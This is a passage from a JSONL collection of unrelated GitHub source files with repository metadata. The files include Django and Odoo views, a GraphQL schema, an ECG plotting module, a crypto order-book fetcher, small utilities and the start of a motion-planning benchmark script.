request.env['res.country'].sudo().search([])\r\n qcontext['country_id'] = request.env['res.country'].sudo().search([('code','=','BE')]).id\r\n\r\n return request.render('auth_signup.signup', qcontext)\r\n","repo_name":"coopiteasy/vertical-distribution-circuits","sub_path":"dc_website_registration/controllers/authsignup.py","file_name":"authsignup.py","file_ext":"py","file_size_in_byte":6558,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"26913208499","text":"#encoding:utf-8\n\n\ndef main(a):\n title=\"\"\n maxstr=\"\"\n for i in a:\n #判断小写\n if i.islower()==True:\n title=title+i\n else:\n maxstr=maxstr+i\n\n returnstr=title+maxstr\n return returnstr\n\nif __name__ == '__main__':\n\n a=\"Ac\"\n\n str =main(a)\n print(str)","repo_name":"devile-xiang/-_python_spider","sub_path":"LintCode_test/dome5-字符串先小写再大写.py","file_name":"dome5-字符串先小写再大写.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38250528231","text":"from typing import Any\nfrom pathlib import Path\n\n\ndef leading_spaces(line: str) -> int:\n \"\"\"\n Calculates the number of leading spaces in a string.\n\n Parameters\n ----------\n line\n\n Returns\n -------\n int\n \"\"\"\n return len(line) - len(line.lstrip())\n\n\ndef parse_value(value: str) -> Any:\n \"\"\"\n Parses a value into its proper type.\n\n Parameters\n ----------\n value: str\n\n Returns\n -------\n Any\n \"\"\"\n value = value.strip()\n if value.isdigit():\n return int(value)\n try:\n return float(value)\n except ValueError:\n pass\n if value.lower() in ['true', 'false']:\n return value.lower() == 'true'\n if value.lower() in ['none', 'null']:\n return None\n if value.startswith('\"') and value.endswith('\"'):\n value = value[1:-1]\n if value.startswith(\"'\") and value.endswith(\"'\"):\n value = value[1:-1]\n if '~' in value:\n value = str(Path(value).expanduser())\n return value\n\n\ndef parse_line(line: str, sep: str = '=') -> tuple[str, Any] | None:\n \"\"\"\n Parses a line into a key and value.\n\n Examples\n --------\n `key = value`\n `key: value`\n\n Parameters\n ----------\n line: str\n sep: str\n The separator for splitting\n\n Returns\n -------\n Tuple[str, Any]\n The key and value of the line.\n \"\"\"\n if line.startswith('#'):\n return None\n if sep not in line:\n return None\n key, value = line.split(sep, 1)\n value: Any = parse_value(value)\n return key, value\n","repo_name":"mas-4/scrummy","sub_path":"scrummy/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27839744027","text":"\"\"\"Video Qualities API\"\"\"\n\nfrom api.base import Base\n\n\nclass VideoQuality(Base):\n \"\"\"Video Quality implementation of Base API class\"\"\"\n\n _url = Base._url + \"/video_qualities\"\n id_list_to_delete = []\n current_id = \"\"\n\n def create(self, name: str, abbr=\"AbbrVideoTest\", position=1, default=False) -> dict:\n \"\"\"Create Video Quality\"\"\"\n\n body = {\n \"name\": name,\n \"abbr\": abbr,\n \"position\": position,\n \"default\": default\n }\n\n response = Base.create_item(self, body)\n return response\n\n def update(self, item_id, name: str, abbr=\"NewAbbrVideoTest\", position=20, default=True):\n \"\"\"Update Video Quality\"\"\"\n\n body = {\n \"name\": name,\n \"abbr\": abbr,\n \"position\": position,\n \"default\": default\n }\n\n Base.update_item(self, item_id, body)\n","repo_name":"vit-ganich/herokuapp-tests","sub_path":"api/video_quality.py","file_name":"video_quality.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6542648366","text":"#!/usr/bin/python3\n#\n# ECG Viewer\n# Written by Kevin Williams - 2022\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301, USA.\n\nimport math\nimport numpy\nimport logging\nimport pyqtgraph as pg\nfrom PyQt5 import QtCore\nfrom scipy.signal import savgol_filter\n\n\ndef graph_draw(self) -> None:\n \"\"\"\n Draws the data stored in self.value_history to the pyqtgraph window.\\n\n Pulls the status of the 'Show Signal Tracking' checkbox.\\n\n If the checkbox is checked, it draws the raw, unfiltered waveform with tracking information.\\n\n If the checkbox is not checked, it draws the savgol-filtered data.\n \"\"\"\n\n # display the filtered graph\n if not self.show_track.isChecked():\n try:\n fdat = savgol_filter(\n self.value_history,\n window_length = self.window_length_box.value(),\n polyorder = self.polyorder_box.value(),\n mode = 'interp',\n )[25:self.value_history_max - 25]\n except ValueError as e:\n self.window_length_box.setValue(199)\n self.polyorder_box.setValue(7)\n logging.warning(f\"Invalid filter settings: \\n{e}\")\n return\n self.curve.setData(numpy.arange(fdat.size), fdat, skipFiniteCheck = True)\n\n # Otherwise, display raw waveform with tracking information. VERY SLOW IF ENABLED\n else:\n mean = self.value_history.mean()\n center = self.math_detect_peaks()\n self.graph.clear()\n self.graph.plot(numpy.arange(self.value_history.size), self.value_history, pen = self.green_pen, skipFiniteCheck = True)\n center_line = pg.InfiniteLine(pos = center, angle = 0, movable = False, pen = self.yellow_pen)\n self.graph.addItem(center_line)\n mean_line = pg.InfiniteLine(pos = mean, angle = 0, movable = False, pen = self.red_pen)\n self.graph.addItem(mean_line)\n\n # display a vertical line intersecting each detected peak\n for p in self.peaks:\n l = pg.InfiniteLine(pos = p, angle = 90, movable = False)\n self.graph.addItem(l)\n\n # display holdoff\n for p in self.peaks:\n l = pg.InfiniteLine(pos = p + self.holdoff_box.value(), angle = 90, movable = False, pen = pg.mkPen(color=(200, 200, 255)))\n self.graph.addItem(l)\n\n\ndef graph_fit(self) -> None:\n \"\"\"\n When called, this automatically rescales the graph to fit the data plus\n a padding factor. The padding factor is fetched from the \"zoom\" slider in the\n GUI. This function is fairly slow and should only be called periodically. By\n default, it's only called once a complete sample period has elapsed.\n \"\"\"\n\n self.graph_padding_factor = self.graph_zoom_slider.value() / 100\n high = self.value_history.max()\n low = self.value_history.min()\n pad = math.floor(((high) - (low)) * self.graph_padding_factor)\n self.graph.setRange(\n xRange = (0, self.value_history_max),\n yRange = (high + pad , low - pad)\n )\n\n\ndef graph_bold_toggle(self) -> None:\n \"\"\"\n Doubles the width of the \"pen\" used to draw the graph. There is a performance\n penalty associated with a heavier line. On slower computers, it can be useful\n to reduce the thickness of the line to increase speed. This should be called \n from a UI checkbox\" \n \"\"\"\n\n if self.actionBold_Line.isChecked():\n self.green_pen = pg.mkPen('g', width = 2)\n else:\n self.green_pen = pg.mkPen('g', width = 1)\n self.graph.clear()\n self.curve = self.graph.plot(numpy.arange(self.value_history.size), self.value_history, pen = self.green_pen, skipFiniteCheck = True)\n\n\ndef graph_stop_timer(self):\n \"\"\"Stops the graph update timer.\"\"\"\n if self.graph_timer.isActive():\n self.graph_timer.stop()\n\n\ndef graph_start_timer(self):\n \"\"\"Starts the graph update timer.\"\"\"\n if not self.graph_timer.isActive():\n self.graph_timer.start(self.graph_timer_ms)\n\n\ndef graph_restart_timer(self):\n \"\"\"\n Updates the refresh rate timings for the graph drawing routine. If the\n timer is running, the timer will stop and restart with the new timing.\n This will not start the timer if the timer wasn't running when called. \n \"\"\"\n self.graph_frame_rate = self.FPSGroup.checkedAction().data()\n self.graph_timer_ms = int(1 / (self.graph_frame_rate / 1000))\n if self.graph_timer.isActive():\n self.graph_timer.stop()\n self.graph_timer.start(self.graph_timer_ms)","repo_name":"HTM-Workshop/ECG-Viewer","sub_path":"_ecg_grapher.py","file_name":"_ecg_grapher.py","file_ext":"py","file_size_in_byte":5128,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"33341566151","text":"import string\n\nimport graphene\n\nfrom selene.schema.entity import EntityObjectType, EntityPermission\nfrom selene.schema.base import BaseObjectType\nfrom selene.schema.roles.fields import BaseRoleType\n\nfrom selene.schema.utils import get_text_from_element\n\n\nclass UserRole(BaseRoleType):\n \"\"\"The role of the user.\"\"\"\n\n permissions = graphene.List(EntityPermission)\n\n @staticmethod\n def resolve_permissions(root, _info):\n permissions = root.find('permissions')\n if permissions is None:\n return None\n return permissions.findall(\"permission\")\n\n\nclass UserGroup(BaseObjectType):\n permissions = graphene.List(EntityPermission)\n\n @staticmethod\n def resolve_permissions(root, _info):\n permissions = root.find('permissions')\n if permissions is None:\n return None\n return permissions.findall(\"permission\")\n\n\nclass User(EntityObjectType):\n roles = graphene.List(UserRole, description=\"The roles of the user.\")\n group_list = graphene.List(\n UserGroup, name=\"groups\", description=\"The groups the user belongs to.\"\n )\n host_list = graphene.List(graphene.String)\n hosts_allow = graphene.Boolean(\n description='If True, allow only listed, otherwise forbid listed.'\n )\n iface_list = graphene.List(graphene.String)\n ifaces_allow = graphene.Boolean(\n description='If True, allow only listed, otherwise forbid listed.'\n )\n sources = graphene.List(\n graphene.String,\n description=\"Sources allowed for\" \"authentication for this user.\",\n )\n\n @staticmethod\n def resolve_roles(root, _info):\n roles = root.findall('role')\n if not roles or roles is None:\n return None\n return roles\n\n @staticmethod\n def resolve_group_list(root, _info):\n groups = root.find(\"groups\")\n if groups is None:\n return None\n return groups.findall(\"group\")\n\n @staticmethod\n def resolve_host_list(root, _info):\n hosts_string = get_text_from_element(root, 'hosts')\n if not hosts_string:\n return None\n hosts_string = hosts_string.translate(\n str.maketrans('', '', string.whitespace)\n )\n return hosts_string.split(',')\n\n @staticmethod\n def resolve_hosts_allow(root, _info):\n hosts = root.find(\"hosts\")\n return bool(int(hosts.get(\"allow\")))\n\n @staticmethod\n def resolve_iface_list(root, _info):\n ifaces_string = get_text_from_element(root, 'ifaces')\n if not ifaces_string:\n return None\n ifaces_string = ifaces_string.translate(\n str.maketrans('', '', string.whitespace)\n )\n return ifaces_string.split(',')\n\n @staticmethod\n def resolve_ifaces_allow(root, _info):\n ifaces = root.find(\"ifaces\")\n return bool(int(ifaces.get(\"allow\")))\n\n @staticmethod\n def resolve_sources(root, _info):\n sources_list_xml = root.find('sources').findall('source')\n sources_list = []\n for source in sources_list_xml:\n sources_list.append(source.text)\n return sources_list\n","repo_name":"greenbone/hyperion","sub_path":"selene/schema/users/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"1159786122","text":"from django.shortcuts import render, redirect\r\n\r\nfrom djangoproject.phonebook.models import Contact\r\n\r\n\r\ndef landing_page(request):\r\n contacts = Contact.objects.all()\r\n context = {\r\n 'contacts': contacts\r\n }\r\n return render(request, 'phonebook/index.html', context)\r\n\r\n\r\ndef create_contact(requests):\r\n name = requests.POST.get('name')\r\n number = requests.POST.get('number')\r\n contact = Contact(\r\n name=name,\r\n number=number\r\n )\r\n contact.save()\r\n\r\n return redirect('landing-page')","repo_name":"MitkoVtori/django-phonebook-basic-web-project","sub_path":"djangoproject/djangoproject/phonebook/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"32"} +{"seq_id":"26166811599","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 17 02:17:06 2022\n\n@author: isheng\n\"\"\"\n\nimport os\nimport pandas as pd\nimport linkedin_salary_tools as ljs\nfrom dotenv import load_dotenv\nload_dotenv()\n\n\ndef append_to_csv(job_title, job_title_code, mu, sigma, a, n, norm, experience):\n if experience is None:\n str_exp = '-1'\n else:\n str_exp = ', '.join(experience)\n\n new_dict = dict(\n job_title = job_title,\n job_title_code = int(job_title_code),\n avg = mu,\n std_dev = sigma,\n shape = a,\n normal_dist = norm,\n num_salary = n,\n experience = str_exp,\n )\n new_data = pd.DataFrame(new_dict, index=[0])\n\n try:\n curr_data = pd.read_csv('data/job_dist_parameters.csv')\n print('Updating Primary DB')\n updated_data = pd.concat(\n [curr_data, new_data]\n ).reset_index(drop=True)\n\n updated_data.drop_duplicates(\n subset=['job_title_code', 'experience'],\n keep='last',\n inplace=True\n )\n\n updated_data = updated_data.sort_values('job_title')\n\n updated_data.to_csv(\n 'data/job_dist_parameters.csv',\n index=False,\n mode='w'\n )\n except FileNotFoundError:\n print('Primary DB location does not exist. Creating now.')\n new_data.to_csv('data/job_dist_parameters.csv', index=False)\n return True\n\n\ndef main(job_title_code, limit=-1, experience=None):\n email = os.environ.get('email')\n password = os.environ.get('password')\n api = ljs.linkedin_job_search(email, password)\n df, common_title, a, mu, sigma, n = api.build_distribution(\n job_title_code=job_title_code,\n days=30,\n limit=limit,\n experience=experience,\n )\n normality = True\n if a != 0:\n normality = False\n append_to_csv(common_title, job_title_code, mu, sigma, a, n, normality, experience)\n\n return df\n\n\nif __name__ == \"__main__\":\n main(\n job_title_code='15',\n limit=250,\n experience=['2','3'],\n )\n","repo_name":"ishengy/recent-market-salaries","sub_path":"src/get_salaries.py","file_name":"get_salaries.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71627833690","text":"import requests \nfrom bs4 import BeautifulSoup\n\nurl = \"https://shop.hakhub.net/\"\n\nr = requests.get(url)\nsoup = BeautifulSoup(r.text, \"html.parser\")\nelem_li = soup.find_all(\"li\", {\"class\":\"product\"})\n\nfor index, li in enumerate(elem_li):\n print(f\"\\n======={index+1}번 상품=======\")\n print('상품명:' ,li.find(\"h2\", {\"class\":\"woocommerce-loop-product__title\"}).text)\n price = li.find(\"span\", {\"class\":\"price\"}).text\n print('가격:',price.split(' ')[-1])\n try:\n print('평점 :',li.find(\"strong\", {\"class\":\"rating\"}).text)\n except Exception as e:\n print('평점 정보가 없어요')","repo_name":"MaiBoii/HackSomething","sub_path":"by_PYTHON/WEB_CRAWLING/4_item_crawling.py","file_name":"4_item_crawling.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"69980999131","text":"##########################################\n##\n## Use exchange APIs.\n## Initialize a list of exchanges.\n## Assign multithreading workers to fetch obs.\n## Connect to mongodb.\n## Fetch real-time obs into mongodb as 1) exchange-specific obs and 2) consolidated ob.\n##\n## Yi Bao 06/14/2018\n##\n##########################################\nimport ccxt\nimport time\nimport datetime\nimport pymongo\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom pprint import *\nfrom threading import Thread\nfrom lib_index import *\n\n\n''' load exchanges '''\nexchange_names = ['gdax', 'bitfinex', 'gemini', 'kraken', 'bitstamp']\nexchanges = [eval('ccxt.%s()' % x) for x in exchange_names]\nn_ex = len(exchange_names)\nexchanges[1].rateLimit = 2000 # increase bitfinex rateLimit\n\nelapsed = 0\nsymbol = 'BTC/USD' # base/quote\nprices = []\ntimestamps = np.array([])\n\n''' set mongodb parameters '''\nhost = \"gorilla0.aws.noblegrp.com\"\nport = 27017\ndb_name = \"indexation\"\nquery = None\n\n''' connect to mongo '''\ntry:\n db = connect_mongo(host=host, port=port, username=None, password=None, db=db_name)\n print(\"Connection to mongo succeeds\")\nexcept:\n print(\"Connection to mongo fails\")\n\n''' assign workers to fetch each exchange '''\nobs = [{} for _ in range(n_ex)]\nfor i_ex in range(n_ex):\n thread = Thread(target = api_worker, args = [obs, i_ex, exchanges[i_ex], symbol])\n thread.start()\n\ntime.sleep(3)\nstart_time = time.time()\nwhile elapsed < 7200:\n timestamps = np.append(timestamps, datetime.datetime.now())\n con_bid = []\n con_ask = []\n mid = []\n\n for i, ob in enumerate(obs):\n ob['_id'] = timestamps[-1]\n try:\n db[exchange_names[i]].insert_one(ob)\n except pymongo.errors.DuplicateKeyError:\n print(\"insertion of\", exchange_names[i], \"gives a duplicate key\")\n try:\n for order in ob['bids'][:100]:\n con_bid.append(order)\n for order in ob['asks'][:100]:\n con_ask.append(order)\n mid.append((ob['asks'][0][0] + ob['bids'][0][0]) / 2.0)\n except:\n mid.append(np.nan)\n \n con_bid.sort(key = lambda x: x[0], reverse = True)\n con_ask.sort(key = lambda x: x[0]) \n index = cryptoindex(con_ask, con_bid)\n con_dict = {'con_bid': con_bid, 'con_ask': con_ask, 'index': index, '_id': timestamps[-1]}\n try:\n db['consolidated'].insert_one(con_dict)\n except pymongo.errors.DuplicateKeyError:\n print(\"insertion of consolidated order book gives a duplicate key\")\n prices.append([index] + mid)\n print(datetime.datetime.now(), index, mid)\n elapsed += 1\n time.sleep(0.5)\n\nend_time = time.time()\nprint(\"Elapsed time %ssecs\" % (end_time - start_time))\n\n\n'''\nplt.subplot()\nlabels = [\"index\"] + exchange_names\nprices = np.array(prices)\nfor i in range(len(labels)):\n plt.plot(timestamps, prices[:,i], label = labels[i])\nplt.legend()\nplt.grid()\nplt.show()\n'''\n","repo_name":"cqbaoyi/cryptoindex","sub_path":"exchange_handler.py","file_name":"exchange_handler.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18605097858","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 9 21:06:44 2022\n\n@author: 97503\n\"\"\"\nimport os\nimport logging\n\npath = \"./result\"\n#判断是否存在文件夹如果不存在则创建为文件夹\nif not os.path.exists(path): \n os.makedirs(path)\n\n\n# 第一步,创建一个logger\nmyLogger = logging.getLogger(\"myLogger\")\nmyLogger.setLevel(logging.INFO) # Log等级总开关 此时是INFO\n\n# 第二步,创建一个handler,用于写入日志文件\nlogfile = os.path.join(path,'log.txt')\nfileLogging = logging.FileHandler(logfile) # open的打开模式这里可以进行参考\nfileLogging.setLevel(logging.INFO) # 输出到file的log等级的开关\n\n# 第三步,再创建一个handler,用于输出到控制台\ncontrolLogging = logging.StreamHandler()\ncontrolLogging.setLevel(logging.DEBUG) # 输出到console的log等级的开关\n\n\n# 第四步,定义handler的输出格式(时间,文件,行数,错误级别,错误提示)\nformatter = logging.Formatter(\"%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: \\n%(message)s\")\nfileLogging.setFormatter(formatter)\ncontrolLogging.setFormatter(formatter)\n\n# 第五步,创建一个handler,将result信息输出到文件\n# warning类型的信息作为result信息\nresultsfile = os.path.join(path,'results.txt')\nresultLogging = logging.FileHandler(resultsfile, encoding= \"utf-8\")\nresultLogging.setLevel(logging.INFO)\nresultfilter = logging.Filter()\nresultfilter.filter = lambda record: record.levelno == logging.WARNING\nresultLogging.addFilter(resultfilter)\n\n# 第六步,将logger添加到handler里面\nmyLogger.addHandler(fileLogging)\nmyLogger.addHandler(controlLogging)\nmyLogger.addHandler(resultLogging)\n\n\nif __name__ == '__main__':\n # 日志级别\n myLogger.debug('这是 logger debug message')\n myLogger.info('这是 logger info message')\n myLogger.warning('这是 logger warning message')\n myLogger.error('这是 logger error message')\n myLogger.critical('这是 logger critical message')\n","repo_name":"jerryfat7/PCA_SIFT","sub_path":"mylogging.py","file_name":"mylogging.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7819935512","text":"# Script to plot data from a NetCDF file onto a Basemap\r\n\r\nfrom netCDF4 import Dataset\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.basemap import Basemap\r\n\r\n# Change the strings according to your dataset\r\nnc = Dataset('../data/pottmp.2014.1time.nc')\r\npottmp = nc.variables['pottmp']\r\nlons = nc.variables['lon'][:]\r\nlats = nc.variables['lat'][:]\r\n# Extracts a 2d field\r\ndata = pottmp[0,0] \r\n\r\n# Replace this with whatever map you want\r\nm = Basemap(projection='ortho', lon_0=-50, lat_0=40, resolution='l')\r\n\r\n# Convert the lons and lats to map coordinates\r\nX,Y = np.meshgrid(lons, lats)\r\nx,y = m(X,Y)\r\n\r\n# Create the plot\r\npc = m.contourf(x, y, data, 30, cmap=plt.get_cmap('YlGnBu_r'))\r\nm.bluemarble()\r\nm.drawmapboundary()\r\nm.drawcoastlines()\r\nplt.title('Orthographic projection of ' + pottmp.long_name + ' (' + pottmp.units + ')')\r\nplt.colorbar(pc, orientation='horizontal')\r\nplt.show()","repo_name":"jonblower/python-viz-intro","sub_path":"Lesson 4. Mapping using the Basemap library/plotmap.py","file_name":"plotmap.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"32"} +{"seq_id":"482446808","text":"#!/usr/bin/env python3\n\"\"\"\nFile: savings_views.py\nAuthor: Zachary King\n\nImplements views/handlers for Savings-related requests\n\"\"\"\n\nfrom django.shortcuts import render, reverse, redirect\nfrom datetime import date, datetime\nfrom django.utils import timezone\nfrom django.contrib.auth.decorators import login_required\nimport decimal\n\nfrom ..models import Wallet, Budget, Transaction, Savings\nfrom ..utils import notifications\n\n\n@login_required(login_url='/pynny/login')\ndef savings(request):\n \"\"\"Displays savings for a user\"\"\"\n # GET = display user's savings\n data = dict()\n if request.method == 'GET':\n # Get the savings for this user\n data['savings'] = Savings.objects.filter(user=request.user)\n\n return render(request, 'pynny/savings/savings.html', context=data)\n # POST = update a Saving\n elif request.method == 'POST':\n # Get the form data from the request\n name = request.POST['name']\n goal = float(request.POST['goal'])\n due_date = request.POST.get('due_date', '')\n if due_date:\n due_date = datetime.strptime(due_date, '%Y-%m-%d').date()\n notify = True if 'notify' in request.POST else False\n delete = True if 'delete' in request.POST else False\n\n # Check if the Saving name exists already\n if Savings.objects.filter(user=request.user, name=name):\n data['alerts'] = {'errors': ['A Saving already exists with that name']}\n data['savings'] = Savings.objects.filter(user=request.user)\n return render(request, 'pynny/savings/savings.html', context=data)\n\n # Create the new Saving\n Savings(name=name, goal=goal, balance=decimal.Decimal('0'),\n due_date=due_date if due_date else None,\n delete_on_completion=delete,\n notify_on_completion=notify, completed=False, hidden=False, user=request.user).save()\n\n data['alerts'] = {'success': ['Done! New Saving created successfully!']}\n if notify:\n data['alerts']['info'] = [\n 'Nice! Since you asked to be notified, you\\'ll receive an email when this Saving is fulfilled']\n data['savings'] = Savings.objects.filter(user=request.user)\n return render(request, 'pynny/savings/savings.html', context=data, status=201)\n\n\n@login_required(login_url='/pynny/login')\ndef one_saving(request, savings_id):\n \"\"\"Used for requests to a single saving (i.e. /savings/3)\"\"\"\n data = dict()\n # Authorize access to the saving\n try:\n saving = Savings.objects.get(id=savings_id)\n except Savings.DoesNotExist:\n data['alerts'] = {'errors': ['Oh Snap! That Saving does not exist']}\n data['savings'] = Savings.objects.filter(user=request.user)\n return render(request, 'pynny/savings/savings.html', context=data, status=404)\n\n if saving.user != request.user:\n data['savings'] = Savings.objects.filter(user=request.user)\n data['alerts'] = {'errors': ['Oh Snap! That Saving does not exist']}\n return render(request, 'pynny/savings/savings.html', context=data, status=403)\n\n if request.method == 'GET':\n # TODO - Create single Saving page and implement the view here\n pass\n elif request.method == 'POST':\n action = request.POST['action'].lower()\n\n if action == 'edit_complete':\n name = request.POST['name']\n goal = float(request.POST['goal'])\n due_date = request.POST.get('due_date', None)\n if due_date:\n due_date = datetime.strptime(due_date, '%Y-%m-%d').date()\n notify = True if 'notify' in request.POST else False\n delete = True if 'delete' in request.POST else False\n\n # Make sure the new name doesn't already exist\n if name != saving.name and Savings.objects.filter(user=request.user, name=name):\n data['alerts'] = {'errors': ['Oh Snap! A Saving already exists with that name']}\n data['savings'] = Savings.objects.filter(user=request.user)\n return render(request, 'pynny/savings/savings.html', context=data, status=200)\n\n # Data is fine, update the Saving\n saving.name = name\n saving.goal = goal\n saving.due_date = due_date\n saving.notify_on_completion = notify\n saving.delete_on_completion = delete\n if saving.goal <= saving.balance:\n complete_saving(saving)\n data['alerts'] = {'success': ['Congratulations! You met your Savings goal for \"{}\"'.format(saving.name)]}\n data['alerts']['success'].append('Done! Saving updated successfully')\n else:\n saving.save()\n\n data['savings'] = Savings.objects.filter(user=request.user)\n return render(request, 'pynny/savings/savings.html', context=data, status=200)\n\n elif action == 'delete':\n saving.delete()\n data['alerts'] = {'success': ['Done! Saving deleted successfully']}\n return render(request, 'pynny/savings/savings.html', context=data)\n\n\ndef complete_saving(saving):\n saving.completed = True\n saving.save()\n\n if saving.notify_on_completion:\n notifications.notify_saving_complete(saving)\n if saving.delete_on_completion:\n saving.delete()\n","repo_name":"zcking/Pynny","sub_path":"mysite/pynny/views/savings_views.py","file_name":"savings_views.py","file_ext":"py","file_size_in_byte":5478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33212621005","text":"import argparse\nimport yaml\n\nfrom unad.loader import LoaderHook, get_loader\nfrom unad.solver_pretrain import SolverPretrain\nfrom unad.utils import seed_everything, init_dist\n\n\ndef main(args):\n # Load config\n with open(args.config, 'r') as f:\n cfg = yaml.load(f, Loader=yaml.SafeLoader)\n print('Using pretraining config', cfg)\n\n # Environment\n seed_everything(1234)\n rank, world_size = init_dist(args)\n use_dist = world_size > 1\n\n # Train\n train_dataloader_hook = LoaderHook(\n **cfg['train_dataloader_hook'],\n use_dist=use_dist\n )\n test_dataloader, _ = get_loader(**cfg['test_dataloader'])\n solver = SolverPretrain(cfg, train_dataloader_hook, test_dataloader,\n use_dist=use_dist, rank=rank, world_size=world_size)\n solver.train()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('config', type=str, help='pretrain config file')\n\n # DDP parameters\n parser.add_argument('--local_rank', type=int, default=0)\n parser.add_argument(\n '--launcher',\n choices=['none', 'pytorch', 'slurm'],\n default='none',\n help='job launcher')\n parser.add_argument('--backend', default='nccl', type=str)\n\n args = parser.parse_args()\n main(args)\n","repo_name":"Nioolek/UNAD","sub_path":"main_pretrain.py","file_name":"main_pretrain.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"7184442017","text":"from rest_framework_jwt.views import ObtainJSONWebToken\n\nfrom drf_yasg.utils import swagger_auto_schema\nfrom drf_yasg import openapi\n\n\nclass ObtainJSONWebTokenExtend(ObtainJSONWebToken):\n \"\"\"\n Modify response data for swagger\n \"\"\"\n\n @swagger_auto_schema(\n responses={\n 200: openapi.Schema(\n type=openapi.TYPE_OBJECT,\n properties={'token': openapi.Schema(type=openapi.TYPE_STRING)}\n )\n }\n )\n def post(self, request, *args, **kwargs):\n return super().post(request, *args, **kwargs)\n","repo_name":"scream4ik/devchallenge12_stage1","sub_path":"proxy/accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8690559390","text":"\nimport time\ndef trailing_zeros(digit):\n i = 5\n res = 0\n while (i<= digit):\n res = res + digit//i\n i *= 5\n return res\n \n \n \n\ndigit = int(input(\"enter number \"))\nstart = time.time()\nprint(\"trailing zeroes in {0} is {1}\".format(digit,trailing_zeros(digit)))\nend = time.time()\nprint(\"time diffrence is {0}\".format(end - start))\n\n","repo_name":"princeamitlali/DSA","sub_path":"factorial/trailing_zero.py","file_name":"trailing_zero.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2442544990","text":"from __future__ import print_function,division\nfrom six import iteritems\n\nfrom pomp.planners import allplanners\nfrom pomp.planners import test\nfrom pomp.example_problems import *\nfrom pomp.spaces.objectives import *\nimport time\nimport copy\nimport sys\nimport os,errno\n\nnumTrials = 10\n\ndef mkdir_p(path):\n \"\"\"Quiet path making\"\"\"\n try:\n os.makedirs(path)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n\ndef testPlannerDefault(problem,problemName,maxTime,plannerType,**plannerParams):\n global numTrials\n print(\"Planning with\",plannerType,'on problem',problemName)\n planner = problem.planner(plannerType,**plannerParams)\n folder = os.path.join(\"data\",problemName)\n mkdir_p(folder)\n test.testPlanner(planner,numTrials,maxTime,os.path.join(folder,allplanners.filename[plannerType]+'.csv'))\n\n\nall_planners = ['ao-est','ao-rrt','r-est','r-est-prune','r-rrt','r-rrt-prune','rrt*','anytime-rrt','stable-sparse-rrt']\nrrt_planners = ['ao-rrt','anytime-rrt','r-rrt','r-rrt-prune','stable-sparse-rrt']\nest_planners = ['ao-est','r-est','r-est-prune']\n\nall_problems = {'Kink':geometric.kinkTest(),\n 'Bugtrap':geometric.bugtrapTest(),\n 'Dubins':dubins.dubinsCarTest(),\n 'Dubins2':dubins.dubinsTest2(),\n 'Flappy':flappy.flappyTest(),\n 'DoubleIntegrator':doubleintegrator.doubleIntegratorTest(),\n 'Pendulum':pendulum.pendulumTest(),\n 'LQR':lqr.lqrTest()}\n\ndefaultParameters = {'maxTime':30}\ncustomParameters = {'Kink':{'maxTime':40,'nextStateSamplingRange':0.15},\n 'Bugtrap':{'maxTime':40,'nextStateSamplingRange':0.15},\n 'Pendulum':{'maxTime':120,'edgeCheckTolerance':0.1,'selectionRadius':.3,'witnessRadius':0.16},\n 'Flappy':{'maxTime':120,'edgeCheckTolerance':4,'selectionRadius':70,'witnessRadius':35},\n 'DoubleIntegrator':{'maxTime':60,'selectionRadius':0.3,'witnessRadius':0.3},\n 'Dubins':{'selectionRadius':0.25,'witnessRadius':0.2},\n 